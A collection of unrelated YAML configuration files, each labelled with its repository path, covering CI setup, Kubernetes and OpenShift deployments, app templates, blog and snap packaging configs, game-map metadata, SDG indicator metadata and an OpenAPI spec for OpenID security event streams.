    - CONSTRUCTOR_CACHE=/tmp/constructor_travis_ci
matrix:
  include:
    # Linux
    - os: linux
      language: generic
      env: PYTHON_VERSION=3.6 CONDA_VERSION=4.6
    - os: linux
      language: generic
      env: PYTHON_VERSION=2.7 CONDA_CANARY=true
    - os: linux
      language: generic
      env: PYTHON_VERSION=3.7 CONDA_CANARY=true
    # OSX
    - os: osx
      language: generic
      env: PYTHON_VERSION=3.6 CONDA_VERSION=4.7
  allow_failures:
    - os: linux
      language: generic
      env: PYTHON_VERSION=3.7 CONDA_CANARY=true
    - os: linux
      language: generic
      env: PYTHON_VERSION=2.7 CONDA_CANARY=true
cache:
  directories:
    - $HOME/condacache/pkgs
    - $HOME/.cache/pip
install:
  - mkdir -p $HOME/condacache/pkgs
  # Install latest miniconda
  - if [[ "$TRAVIS_OS_NAME" == "linux" ]]; then
      wget https://repo.anaconda.com/pkgs/misc/conda-execs/conda-latest-linux-64.exe -O conda.exe;
    else
      wget https://repo.anaconda.com/pkgs/misc/conda-execs/conda-latest-osx-64.exe -O conda.exe;
    fi
  - chmod +x conda.exe
  # use $HOME, not a quoted "~" which the shell would never expand
  - export CONDA_PKGS_DIRS="$HOME/condacache/pkgs"
  - export CONDA_ALWAYS_YES="true"
  - export CONDA_AUTO_UPDATE_CONDA="false"
  # NOTE(review): the canary branch creates env "test" while the other branch
  # creates ~/miniconda; the install/activate lines below assume both exist —
  # confirm against the intended matrix.
  - if [ "${CONDA_CANARY}" = "true" ]; then
      ./conda.exe config --add channels conda-canary;
      ./conda.exe update conda.exe;
      ./conda.exe create -y -q -n test conda python=3.7;
    else
      ./conda.exe create -y -q -p ~/miniconda -c conda-canary conda=$CONDA_VERSION python=$PYTHON_VERSION;
    fi
  # "pillow>=3.1" must be quoted or the shell treats >= as a redirection
  - ./conda.exe install -n test "pillow>=3.1" ruamel_yaml conda-forge::codecov pytest pytest-cov
  - source "$HOME"/miniconda/bin/activate test
  # Install this package
  - pip install --user .
  # this needs
  - mkdir $HOME/miniconda/standalone_conda
  - cp conda.exe $HOME/miniconda/standalone_conda/conda.exe
  # diagnostics
  - conda info
  - conda init
  - source "$HOME"/miniconda/bin/activate
  - conda list
script:
  - pytest --cov=constructor constructor
  - python scripts/run_examples.py
after_success:
  - codecov
© 2020 GitHub, Inc.
Terms
Privacy
Security
Status
Help
Contact GitHub
Pricing
API
Training
Blog
About
|
.travis.yml
|
# DocFX API reference metadata for com.azure.core.amqp.implementation.ReactorReceiver
# (azure-core-amqp 1.7.0-beta.2). Presumably generated output (docs-ref-autogen
# path) — verify before hand-editing.
uid: "com.azure.core.amqp.implementation.ReactorReceiver"
fullName: "com.azure.core.amqp.implementation.ReactorReceiver"
name: "ReactorReceiver"
nameWithType: "ReactorReceiver"
summary: "Handles receiving events from Event Hubs service and translating them to proton-j messages."
inheritances:
- "<xref href=\"java.lang.Object\" data-throw-if-not-resolved=\"False\" />"
inheritedMembers:
- "java.lang.Object.clone()"
- "java.lang.Object.equals(java.lang.Object)"
- "java.lang.Object.finalize()"
- "java.lang.Object.getClass()"
- "java.lang.Object.hashCode()"
- "java.lang.Object.notify()"
- "java.lang.Object.notifyAll()"
- "java.lang.Object.toString()"
- "java.lang.Object.wait()"
- "java.lang.Object.wait(long)"
- "java.lang.Object.wait(long,int)"
syntax: "public class ReactorReceiver implements AmqpReceiveLink"
constructors:
- "com.azure.core.amqp.implementation.ReactorReceiver.ReactorReceiver(java.lang.String,org.apache.qpid.proton.engine.Receiver,com.azure.core.amqp.implementation.handler.ReceiveLinkHandler,com.azure.core.amqp.implementation.TokenManager,com.azure.core.amqp.implementation.ReactorDispatcher)"
methods:
- "com.azure.core.amqp.implementation.ReactorReceiver.addCredits(int)"
- "com.azure.core.amqp.implementation.ReactorReceiver.decodeDelivery(org.apache.qpid.proton.engine.Delivery)"
- "com.azure.core.amqp.implementation.ReactorReceiver.dispose()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getCredits()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getEndpointStates()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getEntityPath()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getHostname()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getLinkName()"
- "com.azure.core.amqp.implementation.ReactorReceiver.isDisposed()"
- "com.azure.core.amqp.implementation.ReactorReceiver.receive()"
- "com.azure.core.amqp.implementation.ReactorReceiver.setEmptyCreditListener(java.util.function.Supplier<java.lang.Integer>)"
- "com.azure.core.amqp.implementation.ReactorReceiver.toString()"
type: "class"
implements:
- "<xref href=\"com.azure.core.amqp.implementation.AmqpReceiveLink?alt=com.azure.core.amqp.implementation.AmqpReceiveLink&text=AmqpReceiveLink\" data-throw-if-not-resolved=\"False\" />"
metadata: {}
package: "com.azure.core.amqp.implementation"
artifact: com.azure:azure-core-amqp:1.7.0-beta.2
|
preview/docs-ref-autogen/com.azure.core.amqp.implementation.ReactorReceiver.yml
|
# Kubernetes ConfigMap carrying the RocketMQ broker configuration file.
# The broker.conf payload below is opaque file content (its inline comments,
# in Chinese, are part of the data) — do not reformat or translate it here.
apiVersion: v1
kind: ConfigMap
metadata:
  name: broker-config
data:
  # mounted into the broker pod as broker.conf
  broker.conf: |
    #所属集群名字
    brokerClusterName=DefaultCluster
    #broker名字,注意此处不同的配置文件填写的不一样,如果在broker-a.properties使用:broker-a,
    #在broker-b.properties使用:broker-b
    brokerName=broker-a
    #0 表示Master,>0 表示Slave
    brokerId=0
    #nameServer地址,分号分割
    #namesrvAddr=rocketmq-0:9876;rocketmq-1:9876
    namesrvAddr=rocketmq:9876
    #启动IP,如果 docker 报 com.alibaba.rocketmq.remoting.exception.RemotingConnectException: connect to <192.168.0.120:10909> failed
    # 解决方式1 加上一句producer.setVipChannelEnabled(false);,解决方式2 brokerIP1 设置宿主机IP, 不要使用docker 内部IP
    #brokerIP1=192.168.0.254
    #在发送消息时,自动创建服务器不存在的topic,默认创建的队列数
    defaultTopicQueueNums=4
    #是否允许 Broker 自动创建Topic,建议线下开启,线上关闭 !!!这里仔细看是false,false,false
    autoCreateTopicEnable=true
    #是否允许 Broker 自动创建订阅组,建议线下开启,线上关闭
    autoCreateSubscriptionGroup=true
    #Broker 对外服务的监听端口
    listenPort=10911
    #haService中使用 默认值为:listenPort + 1
    #haListenPort=10912
    #主要用于slave同步master listenPort - 2
    #fastListenPort=10909
    #删除文件时间点,默认凌晨4点
    deleteWhen=04
    #文件保留时间,默认48小时
    fileReservedTime=120
    #commitLog每个文件的大小默认1G
    mapedFileSizeCommitLog=1073741824
    #ConsumeQueue每个文件默认存30W条,根据业务情况调整
    mapedFileSizeConsumeQueue=300000
    #destroyMapedFileIntervalForcibly=120000
    #redeleteHangedFileInterval=120000
    #检测物理文件磁盘空间
    diskMaxUsedSpaceRatio=88
    #存储路径
    storePathRootDir=/opt/store
    #commitLog 存储路径
    #storePathCommitLog=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/commitlog
    #消费队列存储
    #storePathConsumeQueue=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/consumequeue
    #消息索引存储路径
    #storePathIndex=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/index
    #checkpoint 文件存储路径
    #storeCheckpoint=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/checkpoint
    #abort 文件存储路径
    #abortFile=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/abort
    #限制的消息大小
    maxMessageSize=65536
    #flushCommitLogLeastPages=4
    #flushConsumeQueueLeastPages=2
    #flushCommitLogThoroughInterval=10000
    #flushConsumeQueueThoroughInterval=60000
    #Broker 的角色
    #- ASYNC_MASTER 异步复制Master
    #- SYNC_MASTER 同步双写Master
    #- SLAVE
    brokerRole=ASYNC_MASTER
    #刷盘方式
    #- ASYNC_FLUSH 异步刷盘
    #- SYNC_FLUSH 同步刷盘
    flushDiskType=ASYNC_FLUSH
    #发消息线程池数量
    #sendMessageThreadPoolNums=128
    #拉消息线程池数量
    #pullMessageThreadPoolNums=128
|
single-node/broker-cm.yaml
|
captainVersion: 4
services:
$$cap_appname-db:
image: mysql:5.7
volumes:
- $$cap_appname-db-data:/var/lib/mysql/
environment:
MYSQL_DATABASE: $$cap_mysql_database_name
MYSQL_ROOT_PASSWORD: $$cap_mysql_root_passwd
MYSQL_USER: $$cap_mysql_user
      MYSQL_PASSWORD: $$cap_mysql_passwd
restart: always
caproverExtra:
notExposeAsWebApp: 'true'
$$cap_appname:
environment:
# The DB vars are only used if HUMHUB_AUTO_INSTALL is enabled
# However this is a shady feature so we choose to disable it by default
HUMHUB_AUTO_INSTALL: $$cap_humhub_auto_install
HUMHUB_DB_HOST: srv-captain--$$cap_appname-db
HUMHUB_DB_NAME: $$cap_mysql_database_name
HUMHUB_DB_USER: $$cap_mysql_user
      HUMHUB_DB_PASSWORD: $$cap_mysql_passwd
HUMHUB_HOST: $$cap_appname.$$cap_root_domain
      HUMHUB_PROTO: $$cap_humhub_protocol
image: mriedmann/humhub:$$cap_humhub_version
restart: always
volumes:
- '$$cap_appname-config:/var/www/localhost/htdocs/protected/config'
- '$$cap_appname-uploads:/var/www/localhost/htdocs/uploads'
- '$$cap_appname-modules:/var/www/localhost/htdocs/protected/modules'
caproverOneClickApp:
variables:
- label: Database Root Password
description: Password to manage to the database
defaultValue: $$cap_gen_random_hex(16)
id: $$cap_mysql_root_passwd
- label: Database Name
description: The name of humhub db
defaultValue: humhub
id: $$cap_mysql_database_name
- label: Database User
description: The username to for humhub to connect to database
defaultValue: humhub
id: $$cap_mysql_user
- label: Database Password
description: Password to connect to the database
defaultValue: $$cap_gen_random_hex(16)
id: $$cap_mysql_passwd
- id: $$cap_humhub_version
label: Version Tag
description: Check out their Docker page for the valid tags https://hub.docker.com/r/mriedmann/humhub/tags
defaultValue: '1.6.2'
- id: $$cap_humhub_protocol
label: Server protocol
description: Use http if you don't want to enable secure connection
defaultValue: 'https'
- id: $$cap_humhub_auto_install
label: AutoSetup
description: If this is set to false (advised) you will have to provide the DB creds on first run.
defaultValue: 'false'
instructions:
start: |-
HumHub is an open source social network
GitHub: https://github.com/humhub/humhub
end: |-
All done. The first time you access the instance you will be requested to input the db details.
The database host is srv-captain--$$cap_appname-db and the password and user will be the ones you chose
IMPORTANT: The default protocol is HTTPS, so please turn on HTTPS!
displayName: HumHub
isOfficial: false
description: A open source social media network
documentation: https://github.com/humhub/humhub
|
public/v4/apps/humhub.yml
|
# Site
title: 胡金波的博客
subtitle: 记录生活点滴,分享学习心得
description: 享受编程和技术所带来的快乐
keywords: 软件开发,编程技术,IT技术,Java,JavaScript,Linux,大数据,云计算
author: 胡金波
language: zh-CN
timezone: Asia/Shanghai
# URL
## If your site is put in a subdirectory, set url as 'http://yoursite.com/child' and root as '/child/'
url: https://hujinbo.me
root: /
permalink: posts/:abbrlink/
permalink_defaults:
pretty_urls:
trailing_index: false # Set to false to remove trailing 'index.html' from permalinks
trailing_html: false # Set to false to remove trailing '.html' from permalinks
# Directory
source_dir: source
public_dir: public
tag_dir: tags
archive_dir: archives
category_dir: categories
code_dir: downloads/code
i18n_dir: :lang
skip_render: README.md
# Writing
new_post_name: :title.md # File name of new posts
default_layout: post
titlecase: false # Transform title into titlecase
external_link:
enable: true # Open external links in new tab
field: site # Applies to the whole site or post only
exclude: '' # Exclude hostname. Specify subdomain when applicable, including www
filename_case: 0
render_drafts: false
post_asset_folder: false
relative_link: false
future: true
highlight:
enable: true
line_number: true
auto_detect: false
tab_replace: ' '
wrap: true
hljs: false
# Home page setting
# path: Root path for your blogs index page. (default = '')
# per_page: Posts displayed per page. (0 = disable pagination)
# order_by: Posts order. (Order by date descending by default)
index_generator:
path: ''
per_page: 10
order_by: -date
# Category & Tag
default_category: uncategorized
category_map:
tag_map:
# Metadata elements
## https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
meta_generator: true
# Date / Time format
## Hexo uses Moment.js to parse and display date
## You can customize the date format as defined in
## http://momentjs.com/docs/#/displaying/format/
date_format: YYYY-MM-DD
time_format: HH:mm:ss
## Use post's date for updated date unless set in front-matter
use_date_for_updated: false
# Pagination
## Set per_page to 0 to disable pagination
per_page: 10
pagination_dir: page
# Include / Exclude file(s)
## include:/exclude: options only apply to the 'source/' folder
include:
exclude:
ignore:
# Extensions
## Plugins: https://hexo.io/plugins/
## Themes: https://hexo.io/themes/
theme: next
# WordCounter
## Source: https://github.com/theme-next/hexo-symbols-count-time
symbols_count_time:
symbols: true
time: true
total_symbols: true
total_time: false
exclude_codeblock: false
awl: 4
wpm: 275
# LocalSearch
## Source: https://github.com/theme-next/hexo-generator-searchdb
search:
path: search.xml
field: post
content: true
format: html
# Abbrlink
## Source: https://github.com/rozbo/hexo-abbrlink
abbrlink:
alg: crc16 #support crc16(default) and crc32
rep: dec #support dec(default) and hex
# Sitemap
## Source: https://github.com/hexojs/hexo-generator-sitemap
sitemap:
path: sitemap.xml
#template: ./sitemap_template.xml
rel: false
# Baidu sitemap
## Source: https://github.com/coneycode/hexo-generator-baidu-sitemap
baidusitemap:
path: baidusitemap.xml
# Deployment
## Docs: https://hexo.io/docs/deployment.html
## Source: https://github.com/hexojs/hexo-deployer-git
deploy:
type: git
repo:
    github: git@github.com:hujinbo/hujinbo.github.io.git,master
|
_config.yml
|
name: keepassxc
version: 2.6.0
grade: stable
summary: Community-driven port of the Windows application “KeePass Password Safe”
description: |
KeePassXC is an application for people with extremely high demands on secure
personal data management. It has a light interface, is cross-platform and
published under the terms of the GNU General Public License.
confinement: strict
base: core18
plugs: # plugs for theming, font settings, cursor and to use gtk3 file chooser
gtk-3-themes:
interface: content
target: $SNAP/data-dir/themes
default-provider: gtk-common-themes:gtk-3-themes
icon-themes:
interface: content
target: $SNAP/data-dir/icons
default-provider: gtk-common-themes:icon-themes
sound-themes:
interface: content
target: $SNAP/data-dir/sounds
default-provider: gtk-common-themes:sounds-themes
apps:
keepassxc:
adapter: full
command: usr/bin/keepassxc -style fusion
command-chain:
- bin/desktop-launch
- bin/gtk3-env-launch
plugs: [unity7, x11, opengl, gsettings, home, network, network-bind, removable-media, raw-usb, wayland, desktop-legacy, desktop]
desktop: usr/share/applications/org.keepassxc.KeePassXC.desktop
environment:
DISABLE_WAYLAND: 1
cli:
command: keepassxc-cli
plugs: [x11, gsettings, home, removable-media, raw-usb]
proxy:
command: keepassxc-proxy
plugs: [home]
parts:
keepassxc:
source: .
plugin: cmake
configflags:
- -DCMAKE_BUILD_TYPE=Release
- -DCMAKE_INSTALL_PREFIX=/usr
- -DKEEPASSXC_DIST_TYPE=Snap
- -DKEEPASSXC_BUILD_TYPE=Release
- -DWITH_TESTS=OFF
- -DWITH_XC_ALL=ON
- -DWITH_XC_KEESHARE_SECURE=ON
build-packages:
- g++
- libgcrypt20-dev
- libqt5x11extras5-dev
- libqt5svg5-dev
- qtbase5-dev
- qtbase5-private-dev
- qttools5-dev
- qttools5-dev-tools
- zlib1g-dev
- libxi-dev
- libxtst-dev
- libyubikey-dev
- libykpers-1-dev
- libsodium-dev
- libargon2-0-dev
- libqrencode-dev
- libquazip5-dev
- asciidoctor
stage-packages:
- dbus
- qttranslations5-l10n # common translations
- libgcrypt20
- libykpers-1-1
- libargon2-0
- libsodium23
- libxtst6
- libqt5x11extras5
- libqt5svg5
- try: [libqrencode3, libqrencode4]
- libqt5concurrent5
- libquazip5-1
- libusb-1.0-0
- qtwayland5
- qt5-gtk-platformtheme # for theming, font settings, cursor and to use gtk3 file chooser
- libqrencode3
- xclip
override-build: |
snapcraftctl build
sed -i 's|Icon=keepassxc|Icon=${SNAP}/usr/share/icons/hicolor/256x256/apps/keepassxc.png|g' $SNAPCRAFT_PART_INSTALL/usr/share/applications/org.keepassxc.KeePassXC.desktop
organize:
usr/share/qt5/translations/*.qm: usr/share/keepassxc/translations/
stage:
- -opt
after: [desktop-qt5]
launchers: # custom launcher to set QT_QPA_PLATFORMTHEME=gtk3 correctly
source: snap/local/launchers
plugin: dump
organize:
'*': bin/
stage:
- -bin/README.*
desktop-qt5:
source: https://github.com/ubuntu/snapcraft-desktop-helpers.git
source-subdir: qt
plugin: make
make-parameters: ["FLAVOR=qt5"]
build-packages:
- qtbase5-dev
- dpkg-dev
stage-packages:
- libxkbcommon0
- ttf-ubuntu-font-family
- dmz-cursor-theme
- light-themes
- adwaita-icon-theme
- gnome-themes-standard
- shared-mime-info
- libqt5gui5
- libgdk-pixbuf2.0-0
- libgtk2.0-0
- libqt5svg5 # for loading icon themes which are svg
- try: [appmenu-qt5] # not available on core18
- locales-all
|
tests/fixtures/snapcrafts/keepassxc-88a0a8d35a.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-17 15:54"
game: "Unreal Tournament"
name: "CTF-BT+(NB)NoviceCrypt"
author: "<NAME>"
description: "None"
releaseDate: "2000-04"
attachments:
- type: "IMAGE"
name: "CTF-BT+(NB)NoviceCrypt_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/BunnyTrack/N/CTF-BT%2B(NB)NoviceCrypt_shot_1.png"
originalFilename: "ctf-bt+(nb)novicecrypt.zip"
hash: "a0fa48e29435ecc462004897ef71f07d8684bf24"
fileSize: 3721086
files:
- name: "Area51_Music.umx"
fileSize: 1807010
hash: "de81577bc86f254c5474f45210719ef631df00b9"
- name: "CTF-BT+(NB)NoviceCrypt.unr"
fileSize: 9609946
hash: "9e620a9a9d3ecfc5707aaa8127eac734caa6210f"
otherFiles: 0
dependencies:
CTF-BT+(NB)NoviceCrypt.unr:
- status: "OK"
name: "Area51_Music"
- status: "MISSING"
name: "i4Games_BTScripts_200510"
downloads:
- url: "http://www.ut-files.com/index.php?dir=Maps/BunnyTrack/CTF-BT/&file=ctf-bt%2B%28nb%29novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/BunnyTrack/N/ctf-bt%2B(nb)novicecrypt.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/BunnyTrack/&file=ctf-bt%2B%28nb%29novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/BunnyTrack&file=ctf-bt%2B%28nb%29novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/BunnyTrack/N/a/0/fa48e2/ctf-bt%252B(nb)novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/BunnyTrack/N/a/0/fa48e2/ctf-bt%252B(nb)novicecrypt.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "BunnyTrack"
title: "BT+ Novice Crypt"
playerCount: "6-12"
themes:
Skaarj Crypt: 0.7
Ancient: 0.1
Nali Castle: 0.1
bots: false
|
content/Unreal Tournament/Maps/BunnyTrack/N/a/0/fa48e2/ctf-btnbnovicecrypt_[a0fa48e2].yml
|
SDG_GOAL: >-
<p>Objetivo 17: Fortalecer los medios de implementación y revitalizar la Alianza
Mundial para el Desarrollo Sostenible</p>
SDG_TARGET: >-
<p>Meta 17.18: De aquí a 2020, mejorar el apoyo a la creación de capacidad prestado
a los países en desarrollo, incluidos los países menos adelantados y los pequeños
Estados insulares en desarrollo, para aumentar significativamente la disponibilidad
de datos oportunos, fiables y de gran calidad desglosados por ingresos, sexo, edad,
raza, origen étnico, estatus migratorio, discapacidad, ubicación geográfica y otras
características pertinentes en los contextos nacionales</p>
SDG_INDICATOR: >-
<p>Indicador 17.18.3: Número de países que cuentan con un plan estadístico nacional
plenamente financiado y en proceso de aplicación, desglosado por fuente de financiación</p>
META_LAST_UPDATE: '<p>Última actualización: 11 de julio de 2017</p>'
SDG_RELATED_INDICATORS: >-
<h1> Indicadores relacionados a febrero de 2020</h1>
<p>17.19.1: Valor en dólares de todos los recursos puestos a disposición para fortalecer
la capacidad estadística en los países en desarrollo</p>
SDG_CUSTODIAN_AGENCIES: |-
<h1> Información institucional</h1>
<h2> Organización(es) de organización(es):</h2>
<p> Consorcio de Estadísticas para el Desarrollo en el siglo XXI (PARIS21)</p>
STAT_CONC_DEF: >-
<h1>Conceptos y definiciones</h1>
<h2>Definición:</h2>
<p>El indicador Número de países con un plan estadístico nacional totalmente financiado
y en ejecución se basa en el Informe anual sobre la situación de las estrategias
nacionales para el desarrollo de las estadísticas (ENDE). En colaboración con sus
socios, PARIS21 informa sobre el progreso de los países en el diseño y la implementación
de los planes estadísticos nacionales. El indicador es un recuento de los países
que están (i) aplicando una estrategia, (ii) diseñando una o (iii) esperando la
adopción de la estrategia en el año en curso.</p>
SOURCE_TYPE: >-
<h1> Fuentes de datos</h1>
<h2> Descripción:</h2>
<p> Los datos son proporcionados por las Oficinas Nacionales de Estadística. La
información se recopila anualmente y se verifica por correspondencia directa por
correo electrónico con el centro de coordinación nacional para la ENDE del país
(Estrategia Nacional para el Desarrollo de las Estadísticas). </p>
<h2> Lista:</h2>
<p> Oficinas Nacionales de Estadística</p>
FREQ_COLL: |-
<h1>Calendario</h1>
<h2>Recolección de datos:</h2>
<p>Enero-17</p>
REL_CAL_POLICY: |-
<h2> Publicación de datos: </h2>
<p> 1 de febrero de 2017 </p>
DATA_SOURCE: |-
<h1>Proveedores de datos</h1>
<h2>Nombre:</h2>
<p>PARIS21</p>
COMPILING_ORG: |-
<h1>Recopiladores de datos</h1>
<p>PARIS21</p>
DATA_COMP: >-
<h1>Metodología</h1>
<h2>Método de cálculo:</h2>
<p>Recuento simple de los países que están (i) aplicando una estrategia, (ii) diseñando
una o (iii) esperando la adopción de la estrategia en el año en curso.</p>
REG_AGG: >-
<h2> Agregados regionales:</h2>
<p> Los agregados a nivel regional se basan en el recuento total de estrategias
nacionales. </p>
DOC_METHOD: >-
<h2>Métodos y directrices a disposición de los países para la recopilación de datos
a nivel nacional: </h2>
<p>Encuesta PARIS21 sobre los ODS a través del formulario en línea + Informe anual
sobre la situación de las ENDE de PARIS21 (<a href="http://www.paris21.org/nsds-status">http://www.paris21.org/nsds-status</a>)
</p>
<p>Directriz de la ENDE (<a href="http://nsdsguidelines.paris21.org/">http://nsdsguidelines.paris21.org/</a>)
</p>
QUALITY_ASSURE: >-
<h2>Garantía de calidad:</h2>
<p>Consulta con los países para comprobar la información disponible en línea</p>
COVERAGE: >-
<h1>Disponibilidad de datos</h1>
<h2>Descripción:</h2>
<p>La serie temporal actual para 2007-2015 abarca 121 países en desarrollo.</p>
<h2>Series temporales:</h2>
<p>De 2007 a 2015</p>
<h2>Desagregación:</h2>
<p>El indicador se puede desagregar por zonas geográficas.</p>
OTHER_DOC: >-
<h1> Referencias</h1>
<h2> URL:</h2>
<p> <a href="www.paris21.org">www.paris21.org</a> </p>
<h2> Referencias:</h2>
<p> PARIS21 (2016). Informe de situación de las ENDE. Disponible en <a href="http://www.paris21.org/nsds-status">http://www.paris21.org/nsds-status</a></p>
|
translations-metadata/es/17-18-3.yml
|
kind: Template
apiVersion: v1
metadata:
annotations:
description: The Gitea git server (https://gitea.io/en-US/)
tags: instant-app,gitea,datastore
iconClass: "icon-github"
name: gitea
objects:
- kind: ServiceAccount
apiVersion: v1
metadata:
creationTimestamp: null
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
- kind: Service
apiVersion: v1
metadata:
annotations:
description: The Gitea server's http port
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
spec:
ports:
- name: 3000-tcp
port: 3000
protocol: TCP
targetPort: 3000
selector:
app: ${APPLICATION_NAME}
deploymentconfig: ${APPLICATION_NAME}
sessionAffinity: None
type: ClusterIP
status:
loadBalancer: {}
- kind: Route
apiVersion: v1
id: ${APPLICATION_NAME}-http
metadata:
annotations:
description: Route for application's http service.
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
spec:
to:
name: ${APPLICATION_NAME}
- kind: DeploymentConfig
apiVersion: v1
metadata:
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
spec:
replicas: 1
selector:
app: ${APPLICATION_NAME}
deploymentconfig: ${APPLICATION_NAME}
strategy:
resources: {}
rollingParams:
intervalSeconds: 1
maxSurge: 25%
maxUnavailable: 25%
timeoutSeconds: 600
updatePeriodSeconds: 1
type: Rolling
template:
metadata:
creationTimestamp: null
labels:
app: ${APPLICATION_NAME}
deploymentconfig: ${APPLICATION_NAME}
spec:
serviceAccountName: ${APPLICATION_NAME}
containers:
- image: "${GITEA_IMAGE}:${GITEA_VERSION}"
imagePullPolicy: Always
name: ${APPLICATION_NAME}
ports:
- containerPort: 3000
protocol: TCP
resources: {}
terminationMessagePath: /dev/termination-log
volumeMounts:
- name: gitea-repositories
mountPath: /home/gitea/gitea-repositories
- name: gitea-config
mountPath: /home/gitea/conf
readinessProbe:
httpGet:
path: /
port: 3000
scheme: HTTP
initialDelaySeconds: 5
timeoutSeconds: 1
periodSeconds: 20
successThreshold: 1
failureThreshold: 3
livenessProbe:
httpGet:
path: /
port: 3000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 1
periodSeconds: 10
successThreshold: 1
failureThreshold: 3
dnsPolicy: ClusterFirst
restartPolicy: Always
securityContext: {}
terminationGracePeriodSeconds: 30
volumes:
- name: gitea-repositories
emptyDir: {}
- name: gitea-config
emptyDir: {}
test: false
triggers:
- type: ConfigChange
parameters:
- description: The name for the application.
name: APPLICATION_NAME
required: true
value: gitea
- name: GITEA_IMAGE
displayName: Gitea Image
description: The name and tag for the Gitea Image to use
value: "docker.io/wkulhanek/gitea"
required: true
- name: GITEA_VERSION
displayName: Gitea Image Version Tag
description: The tag for the Gitea Image to use
value: "latest"
required: true
|
gitea-template.yml
|
openapi: '3.0.3'
info:
version: 1.0.0
title: Stream Management API for OpenID Shared Security Events
description: |
[OpenID Spec](https://openid.net/specs/openid-sse-framework-1_0.html#management)
HTTP API to be implemented by Event Transmitters. This API can be used by
Event Receivers to query and update the Event Stream configuration and
status, to add and remove subjects, and to trigger verification.
license:
name: MIT
paths:
/.well-known/sse-configuration:
$ref: './paths/transmitter-configuration.yaml'
/.well-known/sse-configuration/{issuer}:
$ref: './paths/transmitter-configuration-with-issuer.yaml'
/stream:
$ref: './paths/stream-configuration.yaml'
/status:
$ref: './paths/status.yaml'
/add-subject:
$ref: './paths/add-subject.yaml'
/remove-subject:
$ref: './paths/remove-subject.yaml'
/verification:
$ref: './paths/verification.yaml'
/jwks.json:
$ref: './paths/jwks.yaml'
/poll:
$ref: './paths/poll.yaml'
/register:
$ref: './paths/register.yaml'
/trigger-event:
$ref: './paths/trigger-event.yaml'
components:
securitySchemes:
BearerAuth:
type: http
scheme: bearer
parameters:
issuer:
$ref: './parameters/path/issuer.yaml'
subject:
$ref: './parameters/query/subject.yaml'
schemas:
StreamStatus:
$ref: './schemas/StreamStatus.yaml'
TransmitterConfiguration:
$ref: './schemas/TransmitterConfiguration.yaml'
StreamConfiguration:
$ref: './schemas/StreamConfiguration.yaml'
UpdateStreamStatus:
$ref: './schemas/UpdateStreamStatus.yaml'
PollDeliveryMethod:
$ref: './schemas/PollDeliveryMethod.yaml'
PushDeliveryMethod:
$ref: './schemas/PushDeliveryMethod.yaml'
RegisterResponse:
$ref: './schemas/RegisterResponse.yaml'
TriggerEventParameters:
$ref: './schemas/TriggerEventParameters.yaml'
# Request Body params
AddSubjectParameters:
$ref: './schemas/AddSubjectParameters.yaml'
PollParameters:
$ref: './schemas/PollParameters.yaml'
RegisterParameters:
$ref: './schemas/RegisterParameters.yaml'
RemoveSubjectParameters:
$ref: './schemas/RemoveSubjectParameters.yaml'
VerificationParameters:
$ref: './schemas/VerificationParameters.yaml'
# Simple Subjects
Account:
$ref: './schemas/subject/Account.yaml'
DID:
$ref: './schemas/subject/DID.yaml'
Email:
$ref: './schemas/subject/Email.yaml'
IssSub:
$ref: './schemas/subject/IssSub.yaml'
JwtID:
$ref: './schemas/subject/JwtID.yaml'
Opaque:
$ref: './schemas/subject/Opaque.yaml'
PhoneNumber:
$ref: './schemas/subject/PhoneNumber.yaml'
SamlAssertionID:
$ref: './schemas/subject/SamlAssertionID.yaml'
# Nested Subjects
SimpleSubject:
$ref: './schemas/subject/SimpleSubject.yaml'
Aliases:
$ref: './schemas/subject/Aliases.yaml'
ComplexSubject:
$ref: './schemas/subject/ComplexSubject.yaml'
# Subject
Subject:
$ref: './schemas/subject/Subject.yaml'
# Errors
Error:
$ref: './schemas/Error.yaml'
responses:
BadRequest:
# 400
description: Request body cannot be parsed or the request is otherwise invalid
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
Unauthorized:
# 401
description: Authorization failed or is missing
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
Forbidden:
# 403
description: User not authorized to access resource
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
NotFound:
# 404
description: Resource not found
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
TooManyRequests:
# 429
description: Event Receiver is sending too many requests
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
tags:
- name: StreamManagement
description: |-
[Spec](https://openid.net/specs/openid-sse-framework-1_0.html#management)
Stream Management endpoints provided by an Event Transmitter so that Event Transmitters may configure Event Streams.
- name: Transmitter
description: |-
Additional endpoints provided by an Event Transmitter. These are not needed during Stream Managment, but are used
by Event Receivers for event processing.
- name: OutOfBand
description: |-
Endpoints that are NOT a part of the [Open ID Spec](https://openid.net/specs/openid-sse-framework-1_0.html), but
that exist for convenience within this demo.
|
transmitter_spec/openapi.yaml
|
- name: Windows Virtual Desktop (clássico)
href: ../index.yml
- name: Descrição geral
items:
